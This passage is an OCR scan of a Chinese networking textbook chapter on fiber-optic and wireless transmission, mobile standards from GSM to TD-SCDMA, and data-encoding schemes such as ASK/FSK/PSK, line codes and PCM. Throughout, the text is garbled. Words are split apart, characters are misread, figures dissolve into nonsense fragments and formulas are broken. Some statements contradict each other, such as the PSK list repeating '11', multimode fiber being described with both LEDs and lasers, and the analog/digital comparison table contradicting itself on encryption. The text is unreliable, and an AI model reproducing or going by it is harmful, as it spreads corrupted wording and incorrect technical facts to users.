双 绞 线 和 同 轴 电缆 都 属于 铜 质 电线。 由 于 局 域 网 传输 数据 量 不 大 , 双 绞 线 提供 的 
1000Mbps 带宽 足以 满足 日 常 需求 。 但 是 ,广域网 之 间 若 仍 采用 传统 铜 质 电 缆 连 接 势必 成 
为 网 络 瓶 颈 。 随 着 通信 技术 发 展 , 光 缆 以 其 巨大 的 传输 容量 和 速度 成 为 连接 局 域 网 的 桥梁 。 

光缆 即 光纤 ,全 名 为 光 导 纤维 ,利用 光波 作为 信号 载体 进行 通信 。 由 于 光 信 号 衰减 小 、 
不 受 电 磁 干 扰 、 传 输 距离 远 \ 传 输 容量 大 ,加 之 重量 轻易 铺设 ,玻璃 纤维 SiO, 不 易 腐 食 等 优 
点 ,因而 得 到 迅猛 发 展 。 

光纤 按照 传输 模 数 可 以 分 为 单 模 光 纤 (Single Mode Fiber) 和 多 模 光 纤 (Muti Mode 
Fiber) 。 所 谓 “ 模 ”, 是 指 以 一 定 角度 进入 光纤 的 一 东 光 。 

多 模 光纤 采用 发 光 二 极 管 作为 光源 ,激光 器 遇 到 数字 "1” 发 出 光 脉 冲 , 遇 到 数字 "0” 不 发 
光 脉 冲 。 多 模 光 纤纤 芯 较 大 ,一般 为 50 一 100pm, 可 容纳 多 种 模式 的 光 在 纤 蕊 内 传输 。 多 
模 光 纤 的 纤 蕊 层 采取 折射 率 很 高 的 玻璃 纤 芯 mm ,外 层 是 折射 率 很 低 的 Si0; 包 正 层 n,n 记 n， 
如 图 3-22 所 示 。 入 射 光 分 别 沿 不 同 角度 在 纤 芯 内 以 全 反射 方式 传输 , 光 不 必 沿 直线 传播 ， 
因此 光纤 可 以 自由 弯曲 ,这 给 铺设 带 来 很 大 方便 。 由 于 多 模 光 纤 能 传输 多 种 模式 的 光 , 且 每 


纤 芯 折射 率 高 包 庄 层 折射 率 低 
6 


图 3-22 多 模 光纤 结构 图 


四 “例如 传输 字符 C,C 的 ASCIT 是 67, 转 变 为 二 进 制 就 是 01000011, 用 8 个 bit 标识 一 个 字符 。 假 如 最 后 一 个 bit 由 
“1" 变 为 “0",01000010, 转 变 为 ASCII 就 是 字符 B。 
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束 光 折射 角度 不 同 , 故 抵达 另 一 端的 时 延 也 不 相同 ,这 种 现象 被 称 为 模 分 散 。 模 分 散 极 大 限 
制 了 多 模 光纤 的 带宽 和 距离 ,通常 每 隔 几 公里 需要 中 继 一 次 ,但 铺设 成 本 较 低 ,一 般 用 于 建 
筑 物 内 部 或 地 理 位 置 邻 近 等 短 距 离 低 带宽 通信 。 
六 料 外 大 tt ，， 当 纤 芯 下 径 减 小 至 仅 能 传输 一 种 模式 的 光 时 ， 
/ 称 为 单 模 光纤 。 单 模 光 纤 结构 分 为 3 层 , 中 心 是 玻 
璃 纤 芯 ,直径 为 4 一 10pm, 和 光波 波长 相同 , 仅 能 容 
纳 一 束 光 脉冲 在 纤 芯 以 全 反射 传播 ; 中 间 是 玻璃 封 
图 3-23 单 蕊 光纤 结构 图 套 包 于 ,可 将 光 反 射 回 纤 芯 减少 传输 损耗 : 最 外 层 是 
坚韧 塑料 外 套 , 起 到 保护 减 震 作用 ,如 图 3-23 所 示 。 
单 模 光纤 由 于 仅 能 传输 单 束 光 ,不 会 产生 模 分 散 , 并 且 单 束 光 衰减 较 小 , 故 单 模 光纤 传 
输 容量 很 大 ,最 大 可 达 16Gbps, 适 用 于 大 容量 长 距离 通信 。 
4. 无 线 传 输 
无 线 传输 是 指 利用 自然 界 存 在 介质 ,如 真空 、 空 气 、 液 体 等 进行 无 线 通 信 。 人 类 广泛 使 
用 的 无 线 通 信和 是 利用 电磁 波 在 大 气 中 传输 ,如 红外 线 遥 控 器 、3G 通信 ,蓝牙 、Wi-Fi 本 质 上 
都 是 电磁 波 , 只 是 频率 和 波长 不 同 而 已 。 
(1) 蓝牙 通信 
蓝牙 9 图 Bhuetooth ,是 1998 年 推出 的 一 种 无 线 传输 方式 ,通过 RF 2.4GHz 载波 进行 数 
据 传输 ,拥有 电磁 波 的 共性 ,如 传输 没有 方向 限制 , 且 可 以 穿 透 墙 体 , 且 可 以 在 物体 之 间 反 
射 ` 绕 射 。 目 前 ,蓝牙 主要 用 于 在 短 距 离 范 围 内 将 计算 机 、 移 动 电话 、 打 印 机 、 数 码 相 机 、 耳 
麦 、 鼠 标 键盘 等 便携 设备 连接 在 一 起 ,通过 蓝牙 设备 的 Mac 地 址 进行 全 双 工 通信 。 
(2) 红外 线 IRDA 
红外 线 是 波长 在 750nm 一 1mm 的 电磁 波 ,波长 比 红 色光 长 ,超出 肉眼 识别 范围 ,属于 不 
可 见 光 。 红 外 线 成 本 低廉 ,安全 性 较 高 ,不 能 穿 透 墙 体 ,不 会 产生 电磁 辐射 干扰 ,不 受 无 线 电 
管理 部 门限 制 。 目 前 ,红外 线 广 泛 用 于 家 电 和 遥控 器 的 短 距离 数据 传输 ,也 可 用 于 组 建 小 型 低 
速 的 无 线 局 域 网 。 
(3) Wi-Fi 
Wi-Fi( Wireless Fidelity ,无 线 保 真 ) 使 用 2. 4G Hz 频段 ,与 蓝牙 一 样 同属 于 室内 短 距 离 
无 线 通 信 技 术 。 蓝 牙 的 有 效 传输 距离 只 有 10m, 而 Wi-Fi 可 达 百 米 甚 至 更 远 , 用 户 只 要 将 笔 
记 本 电脑 ,平板 .MID 或 手机 等 便携 设备 通过 Wi-Fi 接 入 无 限 AP 即 上 网 。WiFi CC 伟 
输 速度 快 ,可 靠 性 高 ,在 2007 年 年 底 通 过 的 IEEE 802. 11N 技术 规范 ,其 传输 速度 可 达到 
300Mbps, 加 之 不 需 布线 ,非常 适合 移动 办 公 需 要 ,具有 广阔 市 场 前 景 。 
(4) GSM 
GSM(Global System For Mobile Communications) 全 球 移动 通信 是 1992 年 欧洲 标准 
化 委员 会 统一 推出 的 标准 ,属于 第 2 代数 字 蜂 窝 移动 通信 。GSM 与 第 一 代 蜂 窝 无 线 通信 相 


下 玉 封套 
入 


@ 蓝牙 名 称 起 源 于 十 世纪 丹麦 国王 Harald Blatand, 因 其 喜欢 吃 蓝 梅 , 牙 眼 呈 蓝 色 ,所 以 叫 蓝牙 。Blatand 将 现在 的 
挪威 .瑞典 和 丹麦 统一 起 来 ,蓝牙 传输 以 其 命名 ,含有 将 四 分 五 裂 的 局 面 统 一 起 来 之 意 。 
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比 ,最 大 区 别 是 信 令 和 语音 信道 都 采取 数字 信和 号、 传输 距离 远 、 可 以 有 效 减 小 失真 和 干扰 、 提 
高 通话 质量 。GSM 采用 时 分 多 址 技术 ,传输 速率 为 9. 6Kbps, 提 供 900、1800 和 1900 共 
3 个 频段 ,是 全 球 使 用 最 广泛 的 通信 技术 。 中 国 在 20 世纪 90 年 代 初 引进 GSM 标准 ,目前 
移动 和 联通 都 拥有 自己 的 GSM 网 络 。 移动 GSM 号 码 段 有 134 一 139.150 一 152、158 一 159 
及 部 分 182 和 187 子 号 段 ,联通 有 130~132、155~156 网 段 。 

(5) GPRS 

GPRS(General Packet Radio Service) 通 用 分 组 无 线 服务 是 一 种 基于 GSM/900/1800 
频率 的 无 线 分 组 交换 技术 ,提供 端 到 端的 广 域 的 无 线 IP 连接 ,数据 以 “分 组 ”方式 传输 ,根据 
流量 计 费 。GPRS 有 两 个 接 入 点 ,其 中 CMNET 接 入 点 用 于 访问 因特网 或 java 下 载 ， 
CMWAP 接 入 点 用 于 访问 移动 梦 网 。GPRS 传输 速率 可 提升 至 56 Kbps 甚至 114Kbps, 通 
常 被 描述 成 2. 5G 通信 ,位 于 第 二 代 移 动 通 信 2G 和 第 三 代 移动 通信 3G 之 间 。 采 取 GPRS 
包月 后 用 户 不 仅 可 以 随时 随地 通过 手机 接 入 Internet, 还 可 以 免费 发 送 短信 甚至 拨打 
电话 2。 

(6) CDMA 

CDMA(Code Division Multiple Access) 码 分 多 址 访问 技术 起 源 于 第 二 次 世界 大 战 抗 干 
扰 通 信和 ,后 由 美国 高 通 公司 民用 为 蜂窝 无 线 通 信 。CDMA 是 在 数字 扩 频 通信 技术 上 发 展 起 
来 的 一 种 无 线 通信 , 它 将 需要 传送 的 具有 一 定 信 号 带宽 的 数据 ,用 一 个 远大 于 信号 带宽 的 高 
速 伪 随 机 码 进行 调制 ,接收 端 再 使 用 相同 的 伪 随 机 码 逆向 还 原 数 据 以 实现 语音 加 密 传 输 , 具 
有 容量 大 、 覆 盖 范 围 广 .手机 功 耗 小 .话音 质量 高 2 等 优点 。CDMA 属于 2G 或 2.5G 通信 ， 
作为 下 一 代 3G 移动 通信 标准 和 发 展 方向 。 目 前 ,中 国电 信 、 联 通 和 移动 都 推出 各 自 基于 
CDMA 的 3G 网 络 通 信 。 

CDMA 2000 属于 3G 移动 通信 标准 , 它 在 原 2G 通信 基础 上 加 入 多 媒体 和 因特网 接 入 
功能 ,只 要 在 信号 覆盖 区 域内 ,用 户 都 能 将 手机 或 计算 机 通过 3G 网 卡 接 入 Internet。 中 国 
联通 于 2002 年 开通 CDMA 网 络 并 投入 商用 , 2008 年 被 电信 收购 ,命名 为 天 恤 
Ce-surfing) ,号 码 段 有 133、153、180 和 189。CDMA 2000 采取 多 载 传输 方式 , 极 大 浪费 频率 
资源 ,但 建设 成 本 低廉 , 暂 用 于 2G 向 3G 通信 的 平滑 过 度 。 

WCDMA 宽带 码 分 多 址 是 全 球 商 用 时 间 最 长 ,技术 最 成 熟 \ 可 演进 性 最 好 的 3G 网 络 ， 
它 可 以 看 成 是 CDMA 2000 的 改进 与 扩展 。WCDMA 采用 最 新 异步 传输 模式 和 微 信 元 传输 协 
议 , 信 号 数字 化 后 在 一 个 较 宽 的 频谱 范围 内 扩 频 传输 ,可 在 5MHz 带宽 内 提供 384Kbps 一 
2Mbps 传输 速率 ,支持 移动 设备 之 间 语 音 、 图 像 .数据 以 及 视频 通信 。WCDMA 采用 电路 交 
换 和 分 包 交 换 两 种 交换 技术 ,在 接听 电话 的 同时 可 以 通过 分 包 交换 访问 因特网 。2010 年 年 
初 ,中 国联 通 推 出 了 “联通 3G 一 沃 店 ”, 号 码 段 有 185 和 186, 基 于 WCDMA 技术 提供 可 视 电 
话 、 无 线 上 网 、 手 机 博客 等 多 种 信息 服务 ,而 原来 的 130、131、132、155、156 用 户 也 可 在 无 须 更 


@ 通过 GPRS 发送 短信 和 拨打 电话 的 软件 可 以 在 http://www. gdcp. cn/jpkc/lf 网 站 上 下 载 ,资费 按 GPRS 流量 
计 费 。 

@ CDMA 传输 容量 是 传统 模拟 蜂窝 无 线 通信 的 20 售 ,是 GSM 的 4 一 5 售 , 而 发 射 功率 只 有 GSM 手机 的 1.78%， 
被 称 为 第 三 代 移动 通信 。 
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换 号 码 的 情况 下 直接 升级 到 3G。 

TD-SCDMA( 时 分 同步 码 分 多 址 ) 是 中 国 提出 的 第 三 代 移 动 通信 标准 ,具有 自主 知识 产 
权 , 与 欧洲 WCDMA 标准 .美国 CDMA 2000 标准 并 称 为 3G 时 代 主 流 移动 通信 标准 。TD- 
SCDMA 集 码 分 多 址 (CDMA) .时 分 多 址 (TDMA) 、 频 分 多 址 (FEFDMA) 等 技术 优势 于 一 身 ， 
可 以 联合 检测 ,接力 切换 、 可 变 扩 频 、 自 适应 功率 调整 ,具有 容量 大 、 频 谱 利用 率 高 抗 干 扰 能 
力 强 等 优点 。 由 于 TD-SCDMA 采用 时 分 双 工 传输 模式 , 故 可 以 灵活 设置 上 行 和 下 行 时 阶 
比例 来 调整 上 传 和 下 载 速 率 , 动 态 实 现 电 话 、 上 网 .下 载 . 视 频 等 业务 需求 ,号 码 段 有 147( 移 
动 3G 网 卡 )、157( 移 动 3G 信息 机 ) 和 部 分 182、187、188 子 网 段 。 


3.2 数据 分 类 及 编码 技术 


数据 通信 是 通信 技术 和 计算 机 科学 相 结合 的 一 种 新 兴 通 信 方 式 。 根 据 不 同 的 划分 标 
准 ,数据 通信 可 以 划分 为 以 下 形式 ,如 图 3-24 所 示 。 
按 传输 信道 分 类 : 并 行 传输 和 串 行 传输 
按 传输 时 钟 分 类 : 同步 传输 和 异步 传输 
按 传输 方式 分 类 : 单 工 ` 半 双 工 、 全 双 工 
按 信号 类 型 分 类 : 数字 传输 和 模拟 传输 


图 3-24 数据 通信 分 类 图 


3.2.1 并 行 传输 和 串 行 传输 


并 行 传输 是 多 个 数据 位 各 占 一 条 信道 同时 传输 ,n 条 信道 可 一 次 传输 位 数据 ,如 图 3-25 
所 示 。 并 行 传输 通常 用 于 设备 内 部 近 距 离 传 输 , 如 早期 计算 机 光驱 和 硬盘 通过 IDE 并 口 数 
据 线 ?与 主板 连接 。 它 可 通过 增加 传输 信道 方式 提高 传输 速率 和 带宽 ,计算 机 数据 总 线 可 
以 分 为 8 位 、16 位 、32 位 和 64 位 等 ,8 位 表示 一 次 传输 8 个 比特 ,正好 一 个 字 节 。 


数据 通信 的 分 类 


发 送 六 应 
发 送 端 并 行 通信 信道 接收 端 
60 


加 
是 全 :十 :入 环 二 


图 3-25 ”并行 传输 方式 


@ IDE 并 口 数据 线 分 为 40 针 的 ATA33 线 ,80 针 的 ATA100 线 和 80 针 的 ATA133 线 。ATA33 表示 每 秒 最 大 传 
输 速率 达 33Mbps。 
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串 行 传输 是 指数 据 按 位 品行 排列 成 数据 流 在 一 条 线路 上 传输 ,如 图 3-26 所 示 。 由 于 仅 
存在 一 条 信道 , 故 传输 速率 比 并 行 传输 要 低 很 多 ,但 可 以 节约 铺设 成 本 ,广泛 用 于 电话 网 、 广 
播 网 和 计算 机 远程 传输 之 中 中 。 


LE 品行 通信 信道 LS 


发 送 方 接收 方 
图 3-26 ” 串 行 传输 方式 


3.2.2 同步 传输 和 异步 传输 


无 论 是 并 行 传输 还 是 串 行 传输 ,都 存在 数据 错位 的 问题 。 如 在 串 行 传输 中 ,发 送 方 每 发 
送 8 个 比特 即 发 送 了 1 字 节 ,接收 方 每 接收 8 个 比特 即 接收 了 1 字 节 , 若 在 传输 过 程 中 某 个 
比特 丢失 ,接收 方 会 误 把 其 后 一 个 比特 替补 成 丢失 的 比特 ,导致 丢失 位 以 后 所 有 比特 都 向 前 
移动 一 位 , 称 为 数据 错位 。 为 及 时 让 接收 方 发 现 数据 丢失 并 重 传 ,引入 同步 传输 和 异步 传 
输 ,两 者 区 别 在 于 发 送 方 时 钟 和 接收 方 时 钟 是 否 同步 。 

同步 传输 方式 以 固定 的 时 钟 和 节拍 发 送 数 据 , 即 通过 接收 方 速率 与 发 送 方 速率 保持 一 
致 的 方法 检验 数据 位 是 否 丢失 。 发 送 方 在 传输 前 先 发 送 请 求 同 步 字符 ,告诉 其 发 送 速率 ; 
接收 方 提取 同步 字符 ,严谨 匹配 发 送 方 速率 进行 接收 ,如 图 3-27 所 示 。 由 于 双方 速率 保持 
一 致 ,如 发 送 方 每 秒 发 送 8 个 比特 ,接收 方 在 任意 周期 内 没有 接收 到 相应 比特 位 即 可 知道 数 
据 丢失 ,由 此 避免 错位 现象 。 同 步 传输 速率 高 ,但 要 求 双方 时 钟 匹配 ,实现 起 来 较为 复杂 , 通 
常用 于 高 速 数 据 传输 之 中 。 


传输 数据 (众多 字 节 ) 


接收 方 


图 3-27 同步 传输 方式 


异步 传输 双方 速率 不 匹配 ,为 检验 数据 丢失 错位 ,发送 方 每 发 送 一 个 字 节 必须 加 上 起 始 
位 “0” 和 结束 为 *1” 的 标识 符 , 即 用 一 对 “0” 和 “1” 将 字 节 与 字 节 之 间隔 开 ,避免 错位 ,如 图 3-28 
所 示 。 接 收 方 每 接收 到 一 对 “0”“1” 标 识 符 , 之 间 必 定 包含 8 个 bit, 否则 即 可 认定 数据 丢 
失 , 不 会 将 后 一 字 节 的 比特 替补 成 本 丢失 的 比特 位 ,从 而 解决 错位 问题 。 异 步 传 输 不 需要 双 
方 之 间 的 速率 匹配 ,实现 简单 ,但 每 发 送 一 个 字 节 都 要 加 上 起 始 位 “0” 和 结束 位 "1”, 传 输 效 
率 很 低 ,通常 用 于 低速 传输 之 中 。 同 步 传 输 和 异步 传输 只 能 判断 数据 是 否 丢失 ,不 能 进行 检 
错 , 不 管 是 并 行 传输 还 是 串 行 传输 都 可 以 配合 使 用 。 


@ 现在 计算 机 光驱 和 硬盘 改 用 SATA 串 行 接口 与 主板 连接 ,这 是 由 于 随 着 芯片 工艺 的 提升 ,单个 信道 的 SATA 串 
口 速 率 达 3Gbps, 远 远大 于 硬盘 150Mbps 传输 速率 .因此 串 行 接口 已 能 满足 需求 .没有 必要 再 用 并 行 接口 。 
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传输 数据 01011001(1 字 节 ) 


Ut i i 
加 旧 
可 位 
发 送 方 接收 方 


图 3-28 异步 传输 方式 


3.2.3 单 工 、 半 双 工 和 全 双 工 通信 


按照 传输 的 方向 性 可 将 数据 通信 划分 为 单 工 , 半 双 工 和 全 双 工 通信 。 

(1) 单 工 通信 。 通 信 双 方 只 能 从 一 方 发 送 给 另 一 方 , 一 方 只 能 作为 发 送 端 , 另 一 方 只 能 
作为 接收 端 , 数 据 只 有 一 个 传输 方向 。 单 工 通信 的 典型 应 用 是 电视 台 将 调制 的 数字 信号 通 
过 同 轴 电 缆 广 播 至 电视 终端 ,传输 只 有 一 个 方向 性 ,电视 机 也 不 需要 向 广播 台 发 送 数据 。 

(2) 半 双 工 通信 。 通 信 双 方 都 可 以 发 送 数据 ,但 在 同 个 时 刻 只 能 一 方 发 送 ,一 方 接收 ,不 
能 同时 发 送 数据 。 半 双 工 通信 的 典型 应 用 是 通过 同 轴 电 线 组建 总 线 型 局 域 网 。 由 于 同 轴 电 缆 
的 铜 芯 和 屏蔽 层 绕 成 闭合 回路 组 成 单一 信道 ,只 能 传输 一 路 数字 信号 ,因此 总 线 型 局 域 网 中 的 
计算 机 必须 通过 争 用 数据 总 线 获 得 数据 发 送 权 , 若 同时 发 送 数据 则 会 导致 数据 冲撞 不 可 恢复 。 

(3) 全 双 工 通信 。 通 信 双 方 可 以 同时 发 送 和 接收 数据 。 要 实现 全 双 工 通信 至 少 需要 
4 条 线路 组 成 两 条 通信 信道 ,一 条 用 于 甲 方 发 送 给 乙方 , 另 一 条 用 于 乙方 发 送 给 甲 方 。 在 双 
绞 线 中 ,1、3 和 2,.6 这 4 根 线路 组 成 全 双 工 通信 。 


3.2.4 数字 传输 和 模拟 传输 


信息 是 人 所 能 识别 的 声音 、 图 像 和 文字 ,而 数据 是 计算 机 所 能 识别 的 二 进 制 数 “0” 和 
“1”。 计 算 机 在 通信 时 ,必须 把 二 进 制 数 据 转 变 为 信号 。 线 路 是 数据 传输 的 介质 ,信号 是 数 
据 传输 的 载体 。 信 号 根据 介质 类 型 可 以 分 为 光 信 号 和 电信 号 ,电信 号 根据 调制 方式 可 以 分 
为 数字 信号 和 模拟 信号 。 

1. 模拟 信号 (Analogue Signal) 

模拟 信号 是 随时 间 变 化 的 电流 波 和 电压 波 ,用 电信 号 本 身 的 幅 值 .频率 和 相位 3 个 参数 
表示 数据 的 “0” 和 “1”。 把 待 传输 的 数据 转换 为 模拟 信号 称 为 调制 ,调制 有 3 种 ,分 别 为 幅 移 
键 控 (ASK) 、 频 移 键 控 (FSK) 和 相 移 键 控 (PSK )。 

(1) 幅 移 键 控 :用 同一 频率 两 个 不 同 振幅 的 电流 波 表示 二 进 制 数 。 如 对 于 二 进 制 数 *1” 
调制 成 振幅 为 A 的 波形 ; 对 于 二 进 制 数 “0 调制 成 振幅 为 B 的 波形 ,通常 B= 二 0, 即 不 加 载 任 
何 模拟 波 , 如 图 3-29 所 示 。 


数字 信号 0 | 1 0 | 0 0 1 0 


图 3-29 ” 幅 移 键 控 
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二 进 制 数 1 一 S(1)= 二 Acos(2IIf1) 
二 进 制 数 0 一 S(1)= 二 Bcos(2Hft) 二 0cos(2I1f1) 二 0 
(2) 频 移 键 控 :用 同一 振幅 两 个 不 同 频 率 的 电流 波 表示 二 进 制 数 。 如 对 于 二 进 制 数 “1” 
加 载 频率 为 户 的 模拟 波 , 对 于 二 进 制 数 “0? 加 载 频 率 为 f, 的 模拟 波 ,如 图 3-30 所 示 。 
二 进 制 数 1 ~ S(t) = Acos(2I 户 2 
二 进 制 数 0 ~ SC) = Acos(2I 记 zz) 


"JL 站 


转换 后 的 模拟 信号 人 AAA 


图 3-30 ” 频 移 键 控 


(3) 相 移 键 控 : 用 同一 振幅 同一 频率 不 同 相 位 偏 移 的 电流 波 表示 二 进 制 数 。 将 待 传输 
数据 拆 解 成 4 个 基本 单位 ,分 别 是 *11”“10”、“01” 和 “11”。 载 波 左 移 45" 即 1/8 周期 表示 二 
进 制 数 "11”, 左 移 135 表示 二 进 制 数 "10”, 左 移 225 表示 二 进 制 数 “01”, 左 移 315" 表 示 二 进 
制 数 “00”, 具 体 如 下 。 

二 进 制 数 11 -> S(1) = Acos(2IF 十 45°) 

二 进 制 数 10 -> S(1) = Acos(2IHz 十 135°) 
二 进 制 数 01 -> S(t) = Acos(2IIfi 十 225°) 
二 进 制 数 00 -> S(1) = Acos(2I1ft 十 315°) 

当 传输 数据 调制 成 模拟 信和 号 传输 后 ,传输 距离 较 短 , 抗 干扰 能 力 差 ,信号 中 继 后 噪声 
也 同时 放大 导致 信号 畸形 难以 恢复 ,如 图 3-31 所 示 。 然 而 ,利用 模拟 信号 传输 也 有 优点 : 
@ 实 现 简单 ,器 件 成 本 低廉 ,对 线路 要 求 较 低 : @ 支 持 多 路 复 用 技术 ,多 路 信号 可 以 共享 单 
一 信道 实现 全 双 工 通信 ,适用 于 远程 传输 。 

2. 数字 信号 (Digital Signal) 

数字 信号 是 用 高 低 电 平 信 号 表示 数据 的 “0” 和 “1”。 把 待 传输 数据 转变 为 数字 信号 在 线 
路 上 传输 称 为 数字 编码 。 为 提高 数字 信号 在 远程 传输 的 抗 干扰 能 力 ,并 减少 传输 损耗 ,有 以 
下 几 种 编码 方式 。 

(1) 单 极 性 不 归 零 码 

单 极 性 不 归 零 码 用 0 电 平和 另外 一 种 电 平 表示 数据 。 对 于 数据 “0" 用 0 电 平 表示 ,对 于 
数据 1” 用 正 电 平 十 EE 或 负电 平一 E 表示 ,其 实现 简单 , 抗 干扰 能 力 弱 , 适 用 于 短 距离 数据 传 
输 , 如 图 3-32 所 示 。 

(2) 双 极 性 不 归 零 码 

双 极 性 不 归 零 码 用 正 负 两 种 电 平 表示 数据 ,通常 用 十 E 表示 数据 *1”, 一 E 表示 数据 


@ 噪声 是 来 自 线路 外 的 意外 信号 ,是 由 其 他 线路 电流 激发 成 磁 , 磁 再 激发 成 电流 造成 的 。 因 此 ,在 布线 时 传输 数 
据 的 弱点 线 必须 与 220V 强 电线 分 开 布 线 。 
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+5V, 

= 初始 信号 
+SV 上 

-SV 上 传输 5000m 后 
+5SV 上 

=5VF 传输 10000m 后 


一 传输 10000m 后 整形 放大 
初始 信号 


图 3-31 模拟 信号 的 传输 失真 


1 .1% :WHA et WR ES) ;| 
图 3-32 单 极 性 不 归 零 码 


“0”。 双 极 性 不 归 零 码 实现 稍微 复杂 ,但 由 于 双 极 性 电 平 落差 增 大 , 抗 干扰 能 力 强 , 故 更 容易 
识别 信号 “0” 和 “1”, 适 用 于 长 距离 传输 ,如 图 3-33 所 示 。 


+E 


-E 
证 


图 3-33 ” 双 极 性 不 归 零 码 


(3) 单 极 性 归 零 码 

单 极 性 归 零 码 将 传输 的 每 个 周期 再 划分 成 前 半 周 期 和 后 半 周 期 ,前 半 周 期 用 正 电 平 表 
示 数 据 *1”,0 电 平 表示 数据 *0”; 后 半 周 期 回归 到 0 位 ,提示 接收 方 开始 接收 下 一 周期 数据 ， 
以 利于 通信 双方 的 同步 ,如 图 3-34 所 示 。 
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01000011000 011 
图 3-34 单 极 性 归 零 码 


(4) 双 极 性 归 零 码 


双 极 性 归 零 码 同 样 将 一 个 周期 划分 为 前 半 周 期 和 后 半 周 期 ,前 半 周 期 用 十 E 表示 数据 
“1”, 一 下 表示 数据 “0”; 后 半 周 期 回归 到 0 位 ,以 便 收发 双方 的 同步 ,如 图 3-35 所 示 。 


JI nanny 


有 二 下 二 有 于 有 人 0 
图 3-35” 双 极 性 归 零 码 
(5) 双 极 性 差分 编码 
其 编码 规则 如 下 : 对 于 数据 *1” 变 换 极 性 ,对 于 数据 0” 不 变换 极 性 ,如 图 3-36 所 示 。 


+E 


Or 0 O00 OL 0 OO 0 0 


图 3-36 ” 双 极 性 差分 编码 


(6) 曼彻斯特 码 
其 编码 规则 如 下 : 对 于 数据 "1” 前 半 周 期 用 0 电 平 ,后 半 周 期 用 十 E 表示 ; 对 于 数据 *0” 
前 半 周 期 用 十 E, 后 半 周 期 用 0 电 平 表示 @。 曼 彻 斯 特 码 广泛 应 用 于 以 太 网 和 无 线 编码 中 ， 


如 图 3-37 所 示 。 


0iI0iI0i0iI111;0101010 


图 3-37 曼彻斯特 码 


3. 数字 信号 与 模拟 信号 的 区 别 
数字 信号 和 模拟 信号 本 质 上 都 是 电磁 波 ,都 是 将 待 传输 数据 转变 为 电信 号 以 便 在 线路 


上 传输 ,两 者 之 间 的 本 质 区 别 在 于 对 数据 0" 和 ”1 的 定义 方式 不 同 , 如 模拟 信号 可 以 用 高 低 
频率 表示 数据 *0”“1”, 数 字 信 号 可 以 用 高 低 电压 表示 数据 "0”“1”。 另 外 ,在 安全 性 方面 ， 
模拟 信号 波形 总 可 以 对 应 一 定 的 信息 和 物理 参量 ,如 振幅 、 频 率 和 相位 ; 对 于 数字 信号 而 
言 , 截 取 单个 脉冲 波 是 毫 无 意义 的 ,单个 脉冲 波 只 有 放 在 与 之 连续 的 波 序列 中 才能 代表 一 定 


@ 记忆 : 1 一 01,0 一 10。 
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的 信息 人 2。 

和 模拟 信号 相 比 ,数字 信号 传输 带宽 高 2, 时 延 小 ,支持 数据 加 密 、 数 据 压缩 和 数据 纠 
错 。 信 和 号 在 传输 过 程 中 虽然 也 会 衰减 ,但 中 继 后 噪声 信号 不 会 放大 ,不 会 导致 畸形 不 可 恢 
复 , 如 图 3-38 所 示 。 数 字 信 号 即使 衰减 后 所 代表 的 数据 *0”" 和 “1” 并 未 发 生 任何 变化 ,通过 
中 继 器 将 0 一 十 5V 信和 号 统一 放大 到 十 5V,0 一 一 5V 信号 统一 放大 到 一 5V, 还 原 成 原始 信 
号 ,波形 不 会 发 生 任何 畸形 ,而 模拟 信号 传输 一 定 距离 后 再 中 继 必定 会 产生 失真 。 


0 1 0 1 0 1 1 初始 信号 


上 
+5V 
-5V 


0 1 0 1 0 1 1 衰减 后 信号 


+5V rr rr---=-- 


1 
本 间 间 由 古 关于 和 
二 sa | 
1 


然而 ,数字 信号 也 有 局 限 性 : 器 件 成 本 昂贵 ,对 线路 要 求 严格 ; @ 在 单一 物理 信道 上 
只 能 传输 一 路 数字 信号。 模拟 信号 相对 廉价 ,可 以 通过 多 路 复 用 技术 双向 传输 多 路 模拟 信 
号 实现 全 双 工 。 因 此 ,在 短 距离 传输 中 ,如 局 域 网 内 部 ,通常 采用 数字 通信 ; 而 在 长 距离 传 
输 中 ,如 电话 网 络 ,通常 采用 模拟 通信 。 数 字 信 号 和 模拟 信号 的 区 别 见 表 3-2。 
表 3-2 数字 信号 和 模拟 信号 的 区 别 


类 别 数字 信号 模拟 信号 

器 件 造价 和 铺设 成 本 昂贵 低廉 
传输 带宽 高 低 

是 否 能 同时 传输 多 路 信号 不 能 能 

是 否 支 持 加 密 技术 支持 支持 

是 否 支 持 数据 加 密 支持 不 支持 
是 否 支持 数据 压缩 支持 不 支持 
是 否 支 持 数据 纠 错 支持 不 支持 


@@ ”如 字符 "A" 的 ASCII 是 65, 二 进 制 数据 为 01000001 ,在 转变 为 数字 信号 的 传输 途中 ,被 截取 到 单个 比特 “0”, 这 
单个 比特 0" 不 能 代表 任何 含义 ,只 有 将 它 放 在 8 个 比特 序列 中 才能 代表 字符 “A”。 

回 ” 同 为 双 绞 线 , 模 拟 信号 通信 只 需 利 用 一 对 双 绞 线 即 可 组 成 全 双 工 信道 ; 而 数字 信号 只 有 用 两 对 双 绞 线 才能 组 成 
全 双 工 通信 ,而 带宽 可 达 1000Mbps。 
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在 实际 应 用 中 ,需要 将 数字 信号 和 模拟 信号 相互 转换 以 利用 各 自传 输 优点 。 把 将 数字 
信和 号 转换 为 模拟 信和 号称 为 调制 ,如 上 述 幅 移 键 控 (ASK) 、 频 移 键 控 (FSK) 和 相 移 键 控 (PSK) 
3 种 技术 ; 把 模拟 信号 转换 为 数字 信和 号称 为 解 调 ,有 两 种 技术 ,分 别 是 脉 码 调制 (PCM) 和 增 
量 调制 (CDMD) 。 

(1) 脉 码 调制 (Pulse Code Modulation ,PCM) 

脉 码 调制 适用 于 波形 比较 陡 的 模拟 波 , 先 对 波形 采样 再 进行 量化 为 数字 编码 ,步骤 如 下 。 

a. 采样 。 采 样 是 按 一 定 的 时 间 间 隔 测量 模拟 信号 幅 值 , 间 隔 越 小 转化 的 数据 量 越 多 ， 
但 能 减少 失真 ; 反之 ,间隔 越 大 ,转换 的 数据 量 越 少 , 失 真 越 大 ,必须 结合 实际 场合 选择 合适 
的 采样 间隔 。 对 模拟 信号 采样 如 图 3-39(a) 所 示 。 

b. 量化 。 量 化 是 将 波形 样 点 幅 值 的 取 整 过 程 。 由 于 模拟 信号 是 连续 变化 的 , 故 在 采样 点 
测 得 的 幅 值 不 一 定 是 整数 ,一 般 采 取 分 级 取 整 法 ?量化 为 整数 。 量 化 一 定 会 产生 误差 ,造成 
信号 失真 ,因此 在 打 网 络 电话 时 经 过 数 模 转换 后 的 声音 会 有 所 改变 。 量 化 如 图 3-39(b) 所 示 。 

c， 编码 。 编 码 是 将 量化 后 的 整数 值 用 二 进 制 数 表示 。 如 第 一 周期 幅 值 为 5, 转换 为 二 
